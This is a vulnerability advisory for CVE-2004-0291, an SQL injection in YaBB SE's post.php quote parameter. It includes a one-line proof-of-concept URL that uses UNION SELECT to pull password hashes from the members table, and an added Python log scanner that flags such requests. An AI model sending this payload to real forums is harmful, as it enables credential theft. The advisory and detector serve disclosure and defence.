CVE-2004-0291 - YaBB SE Quote Parameter SQL Injection Vulnerability

Publication

2004-11-23

Last modification

2017-07-11

Summary

SQL injection vulnerability in post.php for YaBB SE 1.5.4 and 1.5.5 allows remote attackers to obtain hashed passwords via the quote parameter.

Description

It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software. YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue; however, other versions could be affected as well.

Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

No exploit is required. The following proof of concept has been supplied:

http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
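With no vendor patch listed, one interim control is to review web server logs for requests whose quote parameter is not a plain number. The following is an added example, not code from YaBB SE or from this advisory; it assumes that a legitimate quote value is a non-negative integer message ID, and the log lines, function names and patterns are constructed for illustration. Note that the request above separates parameters with ';', so the parser splits on both ';' and '&'.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate 'quote' value is a plain non-negative message ID.
VALID_QUOTE = re.compile(r"[0-9]{1,10}")
SQL_HINT = re.compile(r"\b(union|select|from|where)\b|/\*|--|[()']", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def split_params(query):
    """Split on ';' as well as '&' (the request above uses ';'), then decode."""
    params = {}
    for pair in re.split(r"[;&]", query):
        if pair:
            name, _, value = pair.partition("=")
            params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params

def check_request(target):
    """Return (reason, decoded_value) for every suspicious 'quote' value."""
    findings = []
    for value in split_params(urlsplit(target).query).get("quote", []):
        if VALID_QUOTE.fullmatch(value):
            continue
        reason = "sql-pattern" if SQL_HINT.search(value) else "non-numeric"
        findings.append((reason, value))
    return findings

# Constructed access-log lines (documentation IPs, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /yabbse/index.php?board=1;action=post;threadid=1;quote=12 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [01/Jan/2004:10:00:05 +0000] "GET /yabbse//index.php?board=1;action=post;threadid=1;quote=-12)+UNION+SELECT+passwd,null+FROM+yabbse_members/* HTTP/1.0" 200 4800',
    '192.0.2.78 - - [01/Jan/2004:10:00:09 +0000] "GET /yabbse/index.php?action=post&quote=12%27 HTTP/1.0" 200 4790',
    '192.0.2.11 - - [01/Jan/2004:10:00:12 +0000] "GET /yabbse/index.php?action=post;quote=abc HTTP/1.0" 200 5001',
]

def scan_log(lines):
    """Return (line_number, reason, value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if match:
            hits += [(number, r, v) for r, v in check_request(match.group(1))]
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The same strict-integer rule can be enforced at a reverse proxy or web application firewall in front of the forum, rejecting any request whose quote value fails it.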

Risk level (CVSS AV:N/AC:L/Au:N/C:P/I:N/A:N)

Medium

5.0

Access Vector

  • Network

Access Complexity

  • Low

Authentication

  • None

Confidentiality Impact

  • Partial

Integrity Impact

  • None

Affected Products

Vendor  Product  Versions
Yabb    Yabb     1.5.4, 1.5.5